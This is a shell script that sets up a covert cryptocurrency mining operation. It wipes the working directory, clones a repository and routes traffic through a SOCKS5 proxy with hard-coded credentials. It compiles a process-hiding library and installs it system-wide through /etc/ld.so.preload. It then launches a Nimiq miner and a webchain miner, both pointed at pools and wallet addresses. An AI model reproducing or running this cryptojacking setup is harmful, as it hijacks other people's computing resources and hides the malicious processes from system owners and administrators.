rm -rf *

git clone https://gitlab.com/dragaa/nemu
cd nemu

#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata

apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y

tar -xvzf grap.tar.gz
rm -rf grap.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = 8.219.248.72:443
socks5_username = asw
socks5_password = kaya
END


./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "
echo " "

echo ""

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

echo ""

echo " "
echo " "

./graftcp/graftcp rm -rf gas && unzip jres.zip
chmod +x gas
rm -rf Makefile
rm -rf processhider.c
rm -rf README.md
rm -rf .gitignore
rm -rf jres.zip

unzip cak.zip
rm -rf cak.zip
make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

./graftcp/graftcp ./gas -d=0 -a "NQ35RC5GG8R4S54LT7YHQ60KGATJKURXD0YY" -s nimiq.icemining.ca -p 2053 -n $(echo $(shuf -i 1-20000 -n 1)) -t 4  -i Disable & ./graftcp/graftcp wget https://github.com/mintme-com/miner/releases/download/v2.8.0/webchain-miner-2.8.0-linux-amd64.tar.gz
tar xf webchain-miner-2.8.0-linux-amd64.tar.gz && ./graftcp/graftcp ./webchain-miner -o 212.32.255.5:3333 -u 0x8DA6c7e400D9EcFc08Fc9Bc1Eba671D97FCEdDbF -p 250 -t 4 --worker=$(echo $(shuf -i 1-20000 -n 1)) --donate-level=1%
